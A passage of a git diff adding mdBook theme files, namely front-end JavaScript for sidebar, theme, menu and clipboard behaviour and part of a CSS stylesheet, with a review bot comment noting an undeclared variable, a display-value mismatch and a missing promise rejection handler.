(e) { + if (e.target.classList.contains('fa-eye')) { + e.target.classList.remove('fa-eye'); + e.target.classList.add('fa-eye-slash'); + e.target.title = 'Hide lines'; + e.target.setAttribute('aria-label', e.target.title); + + block.classList.remove('hide-boring'); + } else if (e.target.classList.contains('fa-eye-slash')) { + e.target.classList.remove('fa-eye-slash'); + e.target.classList.add('fa-eye'); + e.target.title = 'Show hidden lines'; + e.target.setAttribute('aria-label', e.target.title); + + block.classList.add('hide-boring'); + } + }); + }); + + if (window.playground_copyable) { + Array.from(document.querySelectorAll('pre code')).forEach(function (block) { + var pre_block = block.parentNode; + if (!pre_block.classList.contains('playground')) { + var buttons = pre_block.querySelector(".buttons"); + if (!buttons) { + buttons = document.createElement('div'); + buttons.className = 'buttons'; + pre_block.insertBefore(buttons, pre_block.firstChild); + } + + var clipButton = document.createElement('button'); + clipButton.className = 'clip-button'; + clipButton.title = 'Copy to clipboard'; + clipButton.setAttribute('aria-label', clipButton.title); + clipButton.innerHTML = ''; + + buttons.insertBefore(clipButton, buttons.firstChild); + } + }); + } + + // Process playground code blocks + Array.from(document.querySelectorAll(".playground")).forEach(function (pre_block) { + // Add play button + var buttons = pre_block.querySelector(".buttons"); + if (!buttons) { + buttons = document.createElement('div'); + buttons.className = 'buttons'; + pre_block.insertBefore(buttons, pre_block.firstChild); + } + + var runCodeButton = document.createElement('button'); + runCodeButton.className = 'fa fa-play play-button'; + runCodeButton.hidden = true; + runCodeButton.title = 'Run this code'; + runCodeButton.setAttribute('aria-label', runCodeButton.title); + + buttons.insertBefore(runCodeButton, buttons.firstChild); + runCodeButton.addEventListener('click', function (e) { + 
run_rust_code(pre_block); + }); + + if (window.playground_copyable) { + var copyCodeClipboardButton = document.createElement('button'); + copyCodeClipboardButton.className = 'clip-button'; + copyCodeClipboardButton.innerHTML = ''; + copyCodeClipboardButton.title = 'Copy to clipboard'; + copyCodeClipboardButton.setAttribute('aria-label', copyCodeClipboardButton.title); + + buttons.insertBefore(copyCodeClipboardButton, buttons.firstChild); + } + + let code_block = pre_block.querySelector("code"); + if (window.ace && code_block.classList.contains("editable")) { + var undoChangesButton = document.createElement('button'); + undoChangesButton.className = 'fa fa-history reset-button'; + undoChangesButton.title = 'Undo changes'; + undoChangesButton.setAttribute('aria-label', undoChangesButton.title); + + buttons.insertBefore(undoChangesButton, buttons.firstChild); + + undoChangesButton.addEventListener('click', function () { + let editor = window.ace.edit(code_block); + editor.setValue(editor.originalCode); + editor.clearSelection(); + }); + } + }); +})(); + +(function themes() { + var html = document.querySelector('html'); + // var themeToggleButton = document.getElementById('theme-toggle'); + var themeBtns = document.getElementById('theme-btns'); + var themeColorMetaTag = document.querySelector('meta[name="theme-color"]'); + var themeIds = []; + themeBtns.querySelectorAll('button.theme').forEach(function (el) { + themeIds.push(el.id); + }); + var stylesheets = { + ayuHighlight: document.querySelector("[href$='ayu-highlight.css']"), + tomorrowNight: document.querySelector("[href$='tomorrow-night.css']"), + highlight: document.querySelector("[href$='highlight.css']"), + }; + + // function showThemes() { + // themePopup.style.display = 'block'; + // themeToggleButton.setAttribute('aria-expanded', true); + // themePopup.querySelector("button#" + get_theme()).focus(); + // } + + function updateThemeSelected() { + themeBtns.querySelectorAll('.theme-selected').forEach(function 
(el) { + el.classList.remove('theme-selected'); + }); + themeBtns.querySelector("button#" + get_theme()).classList.add('theme-selected'); + } + + // function hideThemes() { + // themePopup.style.display = 'none'; + // themeToggleButton.setAttribute('aria-expanded', false); + // themeToggleButton.focus(); + // } + + function get_theme() { + var theme; + try { theme = localStorage.getItem('mdbook-theme'); } catch (e) { } + if (theme === null || theme === undefined || !themeIds.includes(theme)) { + return default_theme; + } else { + return theme; + } + } + + function set_theme(theme, store = true) { + let ace_theme; + + if (theme == 'coal' || theme == 'navy' || theme == 'hacktricks-dark') { + stylesheets.ayuHighlight.disabled = true; + stylesheets.tomorrowNight.disabled = false; + stylesheets.highlight.disabled = true; + ace_theme = "ace/theme/tomorrow_night"; + } else if (theme == 'ayu') { + stylesheets.ayuHighlight.disabled = false; + stylesheets.tomorrowNight.disabled = true; + stylesheets.highlight.disabled = true; + ace_theme = "ace/theme/tomorrow_night"; + } else { + stylesheets.ayuHighlight.disabled = true; + stylesheets.tomorrowNight.disabled = true; + stylesheets.highlight.disabled = false; + ace_theme = "ace/theme/dawn"; + } + + setTimeout(function () { + themeColorMetaTag.content = getComputedStyle(document.documentElement).backgroundColor; + }, 1); + + if (window.ace && window.editors) { + window.editors.forEach(function (editor) { + editor.setTheme(ace_theme); + }); + } + + var previousTheme = get_theme(); + + if (store) { + try { localStorage.setItem('mdbook-theme', theme); } catch (e) { } + } + + html.classList.remove(previousTheme); + html.classList.add(theme); + updateThemeSelected(); + } + + // Set theme + var theme = get_theme(); + + set_theme(theme, false); + + // themeToggleButton.addEventListener('click', function () { + // if (themePopup.style.display === 'block') { + // hideThemes(); + // } else { + // showThemes(); + // } + // }); + + 
themeBtns.addEventListener('click', function (e) { + var theme; + if (e.target.className === "theme") { + theme = e.target.id; + } else if (e.target.parentElement.className === "theme") { + theme = e.target.parentElement.id; + } else { + return; + } + if (theme == "default-theme"){ + theme = default_theme + } + set_theme(theme); + }); + + // themePopup.addEventListener('focusout', function(e) { + // // e.relatedTarget is null in Safari and Firefox on macOS (see workaround below) + // if (!!e.relatedTarget && !themeToggleButton.contains(e.relatedTarget) && !themePopup.contains(e.relatedTarget)) { + // hideThemes(); + // } + // }); + + // Should not be needed, but it works around an issue on macOS & iOS: https://github.com/rust-lang/mdBook/issues/628 + // document.addEventListener('click', function(e) { + // if (themePopup.style.display === 'block' && !themeToggleButton.contains(e.target) && !themePopup.contains(e.target)) { + // hideThemes(); + // } + // }); + + // document.addEventListener('keydown', function (e) { + // if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey) { return; } + // if (!themePopup.contains(e.target)) { return; } + + // switch (e.key) { + // case 'Escape': + // e.preventDefault(); + // hideThemes(); + // break; + // case 'ArrowUp': + // e.preventDefault(); + // var li = document.activeElement.parentElement; + // if (li && li.previousElementSibling) { + // li.previousElementSibling.querySelector('button').focus(); + // } + // break; + // case 'ArrowDown': + // e.preventDefault(); + // var li = document.activeElement.parentElement; + // if (li && li.nextElementSibling) { + // li.nextElementSibling.querySelector('button').focus(); + // } + // break; + // case 'Home': + // e.preventDefault(); + // themePopup.querySelector('li:first-child button').focus(); + // break; + // case 'End': + // e.preventDefault(); + // themePopup.querySelector('li:last-child button').focus(); + // break; + // } + // }); +})(); + +(function sidebar() { + var body = 
document.querySelector("body"); + var sidebar = document.getElementById("sidebar"); + var sidebarLinks = document.querySelectorAll('#sidebar a'); + var sidebarToggleButton = document.getElementById("sidebar-toggle"); + // var sidebarResizeHandle = document.getElementById("sidebar-resize-handle"); + var firstContact = null; + + function showSidebar() { + html.classList.remove('sidebar-hidden') + html.classList.add('sidebar-visible'); + body.classList.remove('sidebar-hidden') + body.classList.add('sidebar-visible'); + Array.from(sidebarLinks).forEach(function (link) { + link.setAttribute('tabIndex', 0); + }); + sidebarToggleButton.setAttribute('aria-expanded', true); + sidebar.setAttribute('aria-hidden', false); + try { localStorage.setItem('mdbook-sidebar', 'visible'); } catch (e) { } + } + + function hideSidebar() { + html.classList.remove('sidebar-visible') + html.classList.add('sidebar-hidden'); + body.classList.remove('sidebar-visible') + body.classList.add('sidebar-hidden'); + Array.from(sidebarLinks).forEach(function (link) { + link.setAttribute('tabIndex', -1); + }); + sidebarToggleButton.setAttribute('aria-expanded', false); + sidebar.setAttribute('aria-hidden', true); + try { localStorage.setItem('mdbook-sidebar', 'hidden'); } catch (e) { } + } + + // Toggle sidebar + sidebarToggleButton.addEventListener('click', function sidebarToggle() { + if (body.classList.contains("sidebar-hidden")) { + var current_width = parseInt( + document.documentElement.style.getPropertyValue('--sidebar-width'), 10); + if (current_width < 150) { + document.documentElement.style.setProperty('--sidebar-width', '150px'); + } + showSidebar(); + } else if (body.classList.contains("sidebar-visible")) { + hideSidebar(); + } else { + if (getComputedStyle(sidebar)['transform'] === 'none') { + hideSidebar(); + } else { + showSidebar(); + } + } + }); + + // sidebarResizeHandle.addEventListener('mousedown', initResize, false); + + function initResize(e) { + 
window.addEventListener('mousemove', resize, false); + window.addEventListener('mouseup', stopResize, false); + body.classList.add('sidebar-resizing'); + } + function resize(e) { + var pos = (e.clientX - sidebar.offsetLeft); + if (pos < 20) { + hideSidebar(); + } else { + if (body.classList.contains("sidebar-hidden")) { + showSidebar(); + } + pos = Math.min(pos, window.innerWidth - 100); + document.documentElement.style.setProperty('--sidebar-width', pos + 'px'); + } + } + //on mouseup remove windows functions mousemove & mouseup + function stopResize(e) { + body.classList.remove('sidebar-resizing'); + window.removeEventListener('mousemove', resize, false); + window.removeEventListener('mouseup', stopResize, false); + } + + document.addEventListener('touchstart', function (e) { + firstContact = { + x: e.touches[0].clientX, + time: Date.now() + }; + }, { passive: true }); + + document.addEventListener('touchmove', function (e) { + if (!firstContact) + return; + + var curX = e.touches[0].clientX; + var xDiff = curX - firstContact.x, + tDiff = Date.now() - firstContact.time; + + if (tDiff < 250 && Math.abs(xDiff) >= 150) { + if (xDiff >= 0 && firstContact.x < Math.min(document.body.clientWidth * 0.25, 300)) + showSidebar(); + else if (xDiff < 0 && curX < 300) + hideSidebar(); + + firstContact = null; + } + }, { passive: true }); +})(); + +(function menubarCollapse() { + var menubarCollapseToggleButton = document.getElementById('menubar-collapse-toggle'); + var menubarCollapsePopup = document.getElementById('menubar-collapse-popup'); + + function showCollapse() { + menubarCollapsePopup.style.display = 'flex'; + menubarCollapseToggleButton.setAttribute('aria-expanded', true); + } + + function hideCollapse() { + menubarCollapsePopup.style.display = 'none'; + menubarCollapseToggleButton.setAttribute('aria-expanded', false); + menubarCollapseToggleButton.focus(); + } + + menubarCollapseToggleButton.addEventListener('click', function () { + if 
(menubarCollapsePopup.style.display === 'flex') { + hideCollapse(); + } else { + showCollapse(); + } + }); + + menubarCollapsePopup.addEventListener('focusout', function(e) { + // e.relatedTarget is null in Safari and Firefox on macOS (see workaround below) + if (!!e.relatedTarget && !menubarCollapseToggleButton.contains(e.relatedTarget) && !menubarCollapsePopup.contains(e.relatedTarget)) { + hideCollapse(); + } + }); + + // Should not be needed, but it works around an issue on macOS & iOS: https://github.com/rust-lang/mdBook/issues/628 + document.addEventListener('click', function(e) { + if (menubarCollapsePopup.style.display === 'block' && !menubarCollapseToggleButton.contains(e.target) && !menubarCollapsePopup.contains(e.target)) { + hideCollapse(); + } + }); +})(); + +(function chapterNavigation() { + document.addEventListener('keydown', function (e) { + if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey) { return; } + if (window.search && window.search.hasFocus()) { return; } + var html = document.querySelector('html'); + + function next() { + var nextButton = document.querySelector('.nav-chapters.next'); + if (nextButton) { + window.location.href = nextButton.href; + } + } + function prev() { + var previousButton = document.querySelector('.nav-chapters.previous'); + if (previousButton) { + window.location.href = previousButton.href; + } + } + switch (e.key) { + case 'ArrowRight': + e.preventDefault(); + if (html.dir == 'rtl') { + prev(); + } else { + next(); + } + break; + case 'ArrowLeft': + e.preventDefault(); + if (html.dir == 'rtl') { + next(); + } else { + prev(); + } + break; + } + }); +})(); + +(function clipboard() { + var clipButtons = document.querySelectorAll('.clip-button'); + + function hideTooltip(elem) { + elem.firstChild.innerText = ""; + elem.className = 'clip-button'; + } + + function showTooltip(elem, msg) { + elem.firstChild.innerText = msg; + elem.className = 'clip-button tooltipped'; + } + + var clipboardSnippets = new 
ClipboardJS('.clip-button', { + text: function (trigger) { + hideTooltip(trigger); + let playground = trigger.closest("pre"); + return playground_text(playground, false); + } + }); + + Array.from(clipButtons).forEach(function (clipButton) { + clipButton.addEventListener('mouseout', function (e) { + hideTooltip(e.currentTarget); + }); + }); + + clipboardSnippets.on('success', function (e) { + e.clearSelection(); + showTooltip(e.trigger, "Copied!"); + }); + + clipboardSnippets.on('error', function (e) { + showTooltip(e.trigger, "Clipboard error!"); + }); +})(); + +(function scrollToTop () { + var menuTitle = document.querySelector('.menu-title'); + + menuTitle.addEventListener('click', function () { + document.scrollingElement.scrollTo({ top: 0, behavior: 'smooth' }); + }); +})(); + +(function controllMenu() { + var menu = document.getElementById('menu-bar'); + + (function controllPosition() { + var scrollTop = document.scrollingElement.scrollTop; + var prevScrollTop = scrollTop; + var minMenuY = -menu.clientHeight - 50; + // When the script loads, the page can be at any scroll (e.g. if you reforesh it). 
+ menu.style.top = scrollTop + 'px'; + // Same as parseInt(menu.style.top.slice(0, -2), but faster + var topCache = menu.style.top.slice(0, -2); + menu.classList.remove('sticky'); + var stickyCache = false; // Same as menu.classList.contains('sticky'), but faster + document.addEventListener('scroll', function () { + scrollTop = Math.max(document.scrollingElement.scrollTop, 0); + // `null` means that it doesn't need to be updated + var nextSticky = null; + var nextTop = null; + var scrollDown = scrollTop > prevScrollTop; + var menuPosAbsoluteY = topCache - scrollTop; + if (scrollDown) { + nextSticky = false; + if (menuPosAbsoluteY > 0) { + nextTop = prevScrollTop; + } + } else { + if (menuPosAbsoluteY > 0) { + nextSticky = true; + } else if (menuPosAbsoluteY < minMenuY) { + nextTop = prevScrollTop + minMenuY; + } + } + if (nextSticky === true && stickyCache === false) { + menu.classList.add('sticky'); + stickyCache = true; + } else if (nextSticky === false && stickyCache === true) { + menu.classList.remove('sticky'); + stickyCache = false; + } + if (nextTop !== null) { + menu.style.top = nextTop + 'px'; + topCache = nextTop; + } + prevScrollTop = scrollTop; + }, { passive: true }); + })(); + (function controllBorder() { + function updateBorder() { + if (menu.offsetTop === 0) { + menu.classList.remove('bordered'); + } else { + menu.classList.add('bordered'); + } + } + updateBorder(); + document.addEventListener('scroll', updateBorder, { passive: true }); + })(); +})(); + diff --git a/theme/css/chrome.css b/theme/css/chrome.css new file mode 100644 index 000000000..8cbda7c69 --- /dev/null +++ b/theme/css/chrome.css 
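Review bot: In the `sidebar` IIFE, `showSidebar()` and `hideSidebar()` call `html.classList.remove(...)`/`html.classList.add(...)`, but `html` is only declared as a `var` inside the separate `themes` IIFE, so unless something outside this file defines a global `html`, toggling the sidebar throws a ReferenceError; add `var html = document.querySelector("html");` next to `var body = document.querySelector("body");`. In `menubarCollapse`, the document-level click workaround checks `menubarCollapsePopup.style.display === 'block'` while `showCollapse()` sets `'flex'`, so the popup never closes on an outside click; it should read `if (menubarCollapsePopup.style.display === 'flex' && !menubarCollapseToggleButton.contains(e.target) && !menubarCollapsePopup.contains(e.target)) {`. The `fetch_with_timeout("https://play.rust-lang.org/meta/crates", ...)` chain in `codeSnippets` has no `.catch`, so a timeout or network failure surfaces as an unhandled promise rejection; append `.catch(error => console.error("Playground crate list: " + error.message));`. This file looks like a locally modified copy of mdBook's book.js, so these presumably stem from the local edits rather than upstream — worth diffing against the upstream theme before fixing.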
@@ -0,0 +1,1085 @@ +/* CSS for UI elements (a.k.a. chrome) */ + +html { + scrollbar-color: var(--scrollbar) var(--bg); +} +#searchresults a, +.content a:link, +a:visited, +a > .hljs { + color: var(--links); +} + +/* + body-container is necessary because mobile browsers don't seem to like + overflow-x on the body tag when there is a tag. +*/ +#body-container { + /* + This is used when the sidebar pushes the body content off the side of + the screen on small screens. Without it, dragging on mobile Safari + will want to reposition the viewport in a weird way. + */ + overflow-x: clip; +} + +/* Menu Bar */ + +#menu-bar, +#menu-bar-hover-placeholder { + z-index: 106; + margin: auto calc(0px - var(--page-padding)); +} +#menu-bar { + position: relative; + background-color: var(--bg); + border-block-end-color: var(--table-border-color); + border-block-end-width: 1px; + border-block-end-style: solid; +} +.menu-bar-container { + display: flex; + flex-wrap: wrap; + margin-left: auto; + margin-right: auto; + max-width: var(--container-max-width); + justify-content: space-between; +} +.menu-bar-link, .menu-bar-link:visited { + color: var(--menu-bar-link-color); + font-size: 14px; +} +.menu-bar-link:hover { + color: var(--menu-bar-link-color-hover); +} +#menu-bar.sticky, +#menu-bar-hover-placeholder:hover + #menu-bar, +#menu-bar:hover, +html.sidebar-visible #menu-bar, +body.sidebar-visible #menu-bar { + position: -webkit-sticky; + position: sticky; + top: 0 !important; +} +#menu-bar-hover-placeholder { + position: sticky; + position: -webkit-sticky; + top: 0; + height: var(--menu-bar-height); +} +#menu-bar.bordered { + border-block-end-color: var(--table-border-color); +} +#menu-bar i{ + position: relative; + margin: 0 4px; + z-index: 10; + cursor: pointer; + transition: color 0.5s; +} +@media only screen and (max-width: 420px) { + #menu-bar i, #menu-bar .icon-button { + padding: 0 5px; + } +} + +.icon-button { + border: none; + background: var(--bg); + padding: 4px; + color: 
inherit; + border-radius: 5px; + z-index: 10; + cursor: pointer; + transition: color 0.5s; +} +.icon-button:hover { + background: var(--theme-hover); +} +.icon-button i { + margin: 0; +} + +.right-buttons { + margin: 0 15px; + display: flex; + flex-wrap: wrap; + column-gap: 2.6rem; + align-items: center; +} +.right-buttons a { + text-decoration: none; +} + +@media only screen and (min-width:800px) { + #menubar-collapse { + display: flex !important; + flex-wrap: wrap; + column-gap: 2.6rem; + align-items: center; + } + + #menubar-collapse-toggle { + display: none !important; + } + + #menubar-collapse-popup{ + display: none !important; + } +} +@media only screen and (max-width:799px) { + #menubar-collapse { + display: none !important; + } + + #menubar-collapse-toggle { + display: block !important; + } +} + +/* Collapse Menu Popup */ + +#menubar-collapse-popup { + position: absolute; + right: 30px; + top: var(--menu-bar-height); + z-index: 105; + border-radius: 5px; + font-size: 14px; + color: var(--fg); + background: var(--bg); + border: 1px solid var(--table-border-color); + margin: 0; + padding: 0px; + display: none; + flex-direction: column; + /* Don't let the children's background extend past the rounded corners. 
*/ + overflow: hidden; +} +#menubar-collapse-popup .menu-bar-link { + border: 0; + margin: 0; + padding: 8px 20px; + line-height: 25px; + white-space: nowrap; + text-align: start; + cursor: pointer; + color: inherit; + background: inherit; + font-size: inherit; +} +#menubar-collapse-popup .menu-bar-link:hover { + background-color: var(--theme-hover); +} + + +.left-buttons { + display: flex; + margin: 0 5px; + align-items: center; +} +html:not(.js) .left-buttons button { + display: none; +} + +.menu-title { + display: inline-block; + font-weight: 600; + font-size: 2rem; + line-height: var(--menu-bar-height); + text-align: center; + margin: 0; + flex: 1; + white-space: nowrap; + overflow: hidden; + text-overflow: ellipsis; + cursor: pointer; + color: var(--fg); +} + +.menu-bar, +.menu-bar:visited, +.nav-chapters, +.nav-chapters:visited, +.mobile-nav-chapters, +.mobile-nav-chapters:visited, +.menu-bar .icon-button, +.menu-bar a i { + color: var(--icons) !important; +} + +.menu-bar i:hover, +.menu-bar .icon-button:hover, +.nav-chapters:hover, +.mobile-nav-chapters i:hover { + color: var(--icons-hover) !important; + text-decoration: none !important; +} + +/* Nav Icons */ + +.nav-chapters { + font-size: 2.5em; + text-align: center; + text-decoration: none !important; + padding: 2rem; + border-radius: 1rem; + border: 1px solid var(--table-border-color); + + display: flex; + justify-content: center; + align-content: center; + flex-direction: row; + + transition: color 0.5s, background-color 0.5s; +} + +.nav-chapters:hover { + text-decoration: none !important; +} + +.nav-wrapper { + margin-block-start: 50px; + display: none; +} + +.mobile-nav-chapters { + font-size: 2.5em; + text-align: center; + text-decoration: none; + width: 90px; + border-radius: 5px; + border: 1px solid var(--table-border-color); +} + +/* Only Firefox supports flow-relative values */ +.previous { float: left; } +[dir=rtl] .previous { float: right; } + +/* Only Firefox supports flow-relative values */ 
+.next { + float: right; + right: var(--page-padding); +} +[dir=rtl] .next { + float: left; + right: unset; + left: var(--page-padding); +} + +/* Use the correct buttons for RTL layouts*/ +[dir=rtl] .previous i.fa-angle-left:before {content:"\f105";} +[dir=rtl] .next i.fa-angle-right:before { content:"\f104"; } + +@media only screen and (max-width: 1080px) { + .nav-wide-wrapper { display: none; } + .nav-wrapper { display: block; } +} + +/* sidebar-visible */ +@media only screen and (max-width: 1380px) { + #sidebar-toggle-anchor:checked ~ .page-wrapper .nav-wide-wrapper { display: none; } + #sidebar-toggle-anchor:checked ~ .page-wrapper .nav-wrapper { display: block; } +} + +/* Inline code */ + +:not(pre) > .hljs { + display: inline; + padding: 0.1em 0.3em; + border-radius: 3px; +} + +:not(pre):not(a) > .hljs { + color: var(--inline-code-color); + overflow-x: initial; +} + +a:hover > .hljs { + text-decoration: underline; +} + +pre { + position: relative; +} +pre > .buttons { + position: absolute; + z-index: 100; + right: 0px; + top: 2px; + margin: 0px; + padding: 2px 0px; + + color: var(--icons); + cursor: pointer; + visibility: hidden; + opacity: 0; + transition: visibility 0.1s linear, opacity 0.1s linear; +} +pre:hover > .buttons { + visibility: visible; + opacity: 1 +} +pre > .buttons :hover { + color: var(--icons-hover); + border-color: var(--table-border-color); + background-color: var(--theme-hover); +} +pre > .buttons i { + margin-inline-start: 8px; +} +pre > .buttons button { + cursor: inherit; + margin: 0px 5px; + padding: 4px 4px 3px 5px; + font-size: 12px; + + border-style: solid; + border-width: 1px; + border-radius: 4px; + border-color: var(--table-border-color); + background-color: var(--theme-hover); + transition: 100ms; + transition-property: color,border-color,background-color; + color: var(--icons); +} + +pre > .buttons button.clip-button { + padding: 2px 4px 0px 6px; +} + +pre > .buttons button.clip-button::before { + content: "COPY"; + 
font-size: 12px; + color: var(--icons); +} + +pre > .buttons button.clip-button:hover::before { + color: var(--icons-hover); +} + +@media (pointer: coarse) { + pre > .buttons button { + /* On mobile, make it easier to tap buttons. */ + padding: 0.3rem 1rem; + } + + .sidebar-resize-indicator { + /* Hide resize indicator on devices with limited accuracy */ + display: none; + } +} +pre > code { + display: block; + padding: 1rem; +} + +/* FIXME: ACE editors overlap their buttons because ACE does absolute + positioning within the code block which breaks padding. The only solution I + can think of is to move the padding to the outer pre tag (or insert a div + wrapper), but that would require fixing a whole bunch of CSS rules. +*/ +.hljs.ace_editor { + padding: 0rem 0rem; +} + +pre > .result { + margin-block-start: 10px; +} + +/* Search */ + +#searchresults a { + text-decoration: none; +} + +mark { + border-radius: 2px; + padding-block-start: 0; + padding-block-end: 1px; + padding-inline-start: 3px; + padding-inline-end: 3px; + margin-block-start: 0; + margin-block-end: -1px; + margin-inline-start: -3px; + margin-inline-end: -3px; + background-color: var(--search-mark-bg); + transition: background-color 300ms linear; + cursor: pointer; +} + +mark.fade-out { + background-color: rgba(0,0,0,0) !important; + cursor: auto; +} + + +#search-wrapper { + inset: 0; + backdrop-filter: blur(100px); + z-index: 102; + position: fixed; + overflow-y: scroll; + overscroll-behavior: contain; +} + +#search-wrapper>div { + max-height: 80%; + height: 80%; + transform: translateY(-50%); + top: 50%; + position: relative; + /* overflow: scroll; */ + overscroll-behavior: contain; + margin-left: auto; + margin-right: auto; + max-width: var(--content-max-width); + background-color: var(--bg); + border: 1px solid var(--table-border-color); + border-radius: 8px; + display: flex; + flex-direction: column; +} + +.searchbar-outer { + border-bottom: 1px solid var(--table-border-color); + border-radius: 
8px 8px 0 0; +} + +.searchbar-outer span { + position: absolute; + top: 12px; + left: 15px; + font-size: 15px; + color: var(--searchbar-fg); +} + +#searchbar { + width: 100%; + padding: 10px 16px; + transition: box-shadow 300ms ease-in-out; + background-color: var(--searchbar-bg); + color: var(--searchbar-fg); + border: none; + border-radius: 8px 8px 0 0; + text-indent: 25px; +} + +#searchbar:focus, +#searchbar.active { + outline: none; +} + +.searchresults-header { + font-weight: normal; + font-size: .7em; + padding-block-start: 15px; + padding-block-end: 0; + padding-inline-start: 20px; + padding-inline-end: 20px; + color: var(--searchresults-header-fg); + overflow-y: scroll; + display: none; +} + +.searchresults-outer { + overflow: scroll; + overscroll-behavior: contain; + border-radius: 0 0 8px 8px; +} + +ul#searchresults { + list-style: none; + max-height: 100%; + margin: 0; + padding: 0; +} +ul#searchresults li { + border-radius: 0; + border-bottom: 1px solid var(--table-border-color); + display: flex; + flex-direction: row; + justify-content: space-between; +} +ul#searchresults li:last-child { + border-bottom: none; +} +ul#searchresults li.focus { + background-color: var(--searchresults-li-bg); +} +ul#searchresults li a { + padding: 15px; + color: var(--fg) !important; + background-color: var(--bg); + font-weight: bold; + width: -moz-available; /* WebKit-based browsers will ignore this. */ + width: -webkit-fill-available; /* Mozilla-based browsers will ignore this. 
*/ + width: fill-available; +} +ul#searchresults li a:hover { + background-color: var(--theme-hover); +} +ul#searchresults li a span.teaser { + display: block; + clear: both; + margin-block-start: 5px; + margin-block-end: 0; + margin-inline-start: 20px; + margin-inline-end: 0; + padding-inline-start: 10px; + font-size: 0.8em; + color: var(--icons-hover) !important; + font-weight: 100; + border-left: 3px solid var(--icons-hover); +} +ul#searchresults li a span.teaser em { + font-weight: bold; + font-style: normal; + color: var(--icons) !important; +} + +/* Container */ +@media only screen and (max-width:1439px) { + .container { + margin-left: auto; + margin-right: auto; + max-width: var(--container-max-width); + flex-direction: row; + display: flex; + top: var(--menu-bar-height); + } + .content{ + flex: 1 1 0 + } + .content main { + margin-inline-start: auto; + margin-inline-end: auto; + max-width: 100%; + } +} + +@media only screen and (min-width:1440px) { + .container { + margin-left: auto; + margin-right: auto; + max-width: var(--container-max-width); + flex-direction: row; + display: flex; + top: var(--menu-bar-height); + justify-content: space-between; + } +} + +/* Sidebar */ +@media only screen and (min-width:550px) { + .sidebar { + position: sticky; + top: 4rem; + height: calc(100vh - 4rem); + width: var(--sidebar-width); + font-size: 0.875em; + box-sizing: border-box; + -webkit-overflow-scrolling: touch; + overscroll-behavior: contain; + background-color: var(--sidebar-bg); + color: var(--sidebar-fg); + } +} +@media only screen and (max-width:549px) { + .sidebar { + position: fixed; + bottom: 0; + left: 0; + right: 0; + top: var(--menu-bar-height); + font-size: 0.875em; + box-sizing: border-box; + -webkit-overflow-scrolling: touch; + overscroll-behavior: contain; + background-color: var(--sidebar-bg); + color: var(--sidebar-fg); + z-index: 105; + } +} +.sidebar-iframe-inner { + background-color: var(--sidebar-bg); + color: var(--sidebar-fg); + padding: 10px 
10px; + margin: 0; + font-size: 1.4rem; +} +.sidebar-iframe-outer { + border: none; + height: 100%; + position: absolute; + top: 0; + bottom: 0; + left: 0; + right: 0; +} +[dir=rtl] .sidebar { left: unset; right: 0; } +.sidebar-resizing { + -moz-user-select: none; + -webkit-user-select: none; + -ms-user-select: none; + user-select: none; +} +html:not(.sidebar-resizing) .sidebar { + transition: transform 0.3s; /* Animation: slide away */ +} +.sidebar code { + line-height: 2em; +} +.sidebar .sidebar-scrollbox { + overflow-y: auto; + overscroll-behavior: contain; + position: absolute; + top: 0; + bottom: 0; + left: 0; + right: 0; + padding: 10px 10px; +} +.sidebar .sidebar-resize-handle { + position: absolute; + cursor: col-resize; + width: 0; + right: calc(var(--sidebar-resize-indicator-width) * -1); + top: 0; + bottom: 0; + display: flex; + align-items: center; +} + +.sidebar-resize-handle .sidebar-resize-indicator { + width: 100%; + height: 12px; + background-color: var(--icons); + margin-inline-start: var(--sidebar-resize-indicator-space); +} + +[dir=rtl] .sidebar .sidebar-resize-handle { + left: calc(var(--sidebar-resize-indicator-width) * -1); + right: unset; +} +.js .sidebar .sidebar-resize-handle { + cursor: col-resize; + width: calc(var(--sidebar-resize-indicator-width) - var(--sidebar-resize-indicator-space)); +} +/* sidebar-hidden */ +#sidebar-toggle-anchor:not(:checked) ~ .page-wrapper .page #container #sidebar { + display: none; + +} +#sidebar-toggle-anchor:checked ~ .page-wrapper .page #container #sidebar { + display: block; +} +.sidebar::-webkit-scrollbar { + background: var(--sidebar-bg); +} +.sidebar::-webkit-scrollbar-thumb { + background: var(--scrollbar); +} + +.chapter li.part-title { + color: var(--fg); + font-weight: bold; + text-transform: uppercase; + letter-spacing: .05em; + padding-top: 1.5rem; + padding-right: 1.25rem; + padding-left: 1.25rem; +} + +.chapter { + list-style: none outside none; + padding-inline-start: 0; + line-height: 2.2em; 
+ margin-top: 0; +} + +.chapter ol { + width: 100%; +} + +.chapter li { + display: flex; + color: var(--fg); +} +.chapter li a { + display: block; + padding: 0; + text-decoration: none; + color: var(--sidebar-fg); +} + +.chapter li a:hover { + color: var(--fg); +} + +.chapter li a.active { + color: var(--sidebar-active); + font-weight: 600; +} + +.chapter li > a.toggle { + cursor: pointer; + display: block; + margin-inline-start: auto; + padding: 0 10px; + user-select: none; + opacity: 0.68; +} + +.chapter li > a.toggle div { + transition: transform 0.5s; +} + +/* collapse the section */ +.chapter li:not(.expanded) + li > ol { + display: none; +} + +.chapter li.chapter-item { + line-height: 1.5em; + margin-block-start: 0.6em; + font-size: 1.5rem; + padding-left: 1.25rem; + padding-right: 1.25rem; + padding-top: .375rem; + padding-bottom: .375rem; + border-radius: 5px; +} + +.chapter li.chapter-item:hover { + background-color: var(--sidebar-bg-hover); + color: var(--fg) +} + +.chapter li.expanded > a.toggle div { + transform: rotate(90deg); +} + +.spacer { + width: 100%; + height: 3px; + margin: 5px 0px; +} +.chapter .spacer { + background-color: var(--sidebar-spacer); +} + +@media (-moz-touch-enabled: 1), (pointer: coarse) { + .chapter li a { padding: 5px 0; } + .spacer { margin: 10px 0; } +} + +.section { + list-style: none outside none; + padding-inline-start: 10px; + line-height: 1.9em; + border-left: 1px solid var(--table-border-color); + margin-left: 2.5rem; +} + +.footer { + height: var(--footer-height); + border-top: 1px solid var(--table-border-color); + margin-top: 1rem; + align-content: center; + z-index: 101; +} +.footer .theme-wrapper { + max-width: var(--container-max-width); + margin-left: auto; + margin-right: auto; + display: flex; + justify-content: end; +} +.footer .theme-wrapper .theme-btns { + display: flex; + flex-direction: row; + border-radius: 9999px; + background-color: var(--bg); + border: 1px solid var(--table-border-color); + 
